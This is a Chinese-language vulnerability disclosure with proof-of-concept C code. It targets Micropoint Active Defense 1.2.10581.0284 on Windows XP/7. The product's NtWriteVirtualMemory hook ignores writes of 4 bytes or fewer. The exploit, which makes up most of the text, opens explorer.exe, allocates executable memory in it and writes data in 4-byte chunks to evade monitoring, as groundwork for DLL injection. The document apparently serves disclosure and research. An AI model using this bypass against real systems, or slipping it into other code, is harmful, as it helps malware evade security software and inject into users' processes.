漏洞涉及产品:微点主动防御1.2.10581.0284版本，其他版本尚未关注。

漏洞影响：通过此漏洞可以让攻击者绕过微点对NtWriteVirtualMemory函数的监控，从而能写任意进程的ring3内存空间，为DLL注入等恶意行为铺路。

漏洞详细原理：微点主动防御软件为了有效防止恶意进程写其他进程的内存空间，inlinehook了系统函数NtWriteVirtualMemory。但在处理NtWriteVirtualMemory的第四个参数BufferSize时，未对BufferSize<=4的写入情况进行控制，导致此情景发生。

利用程序代码如下：

操作系统：win7，winXP

By yeluosong

#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>

int main ()
{
int i;
BYTE * lpBuf;
BOOL bFlag;
PROCESSENTRY32   procentry;
HANDLE hProcess, hSnapShot;
DWORD dwSize, dwWritten, dwProcessID;

BYTE buf[40]={1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40};
    dwSize = 4;

hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
procentry.dwSize = sizeof(PROCESSENTRY32);
bFlag= Process32First(hSnapShot, &procentry);
while(bFlag)
{
   if(stricmp(procentry.szExeFile, "explorer.exe")==0)
   {
    dwProcessID = procentry.th32ProcessID;
    break;
   }
   bFlag=Process32Next(hSnapShot,&procentry);
}

printf("explore.exe pid:%d\n", dwProcessID);

    hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwProcessID );

    lpBuf = VirtualAllocEx( hProcess, NULL, 40, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
    if ( NULL == lpBuf )
    {
        CloseHandle( hProcess );
        return FALSE;
    }
printf ("VirtualAllocEx : %x\n", lpBuf);

for (i = 0; i < 10; i++)
{
   if( WriteProcessMemory( hProcess, lpBuf + i * 4, buf + i * 4, dwSize, &dwWritten ) )
   {
    if ( dwWritten != dwSize )
    {
     VirtualFreeEx( hProcess, lpBuf, 40, MEM_DECOMMIT );
     CloseHandle( hProcess );
     printf ("WriteProcessMemory Error!\n");
     return FALSE;
    }
   }
}

    CloseHandle( hProcess );
    return TRUE;
}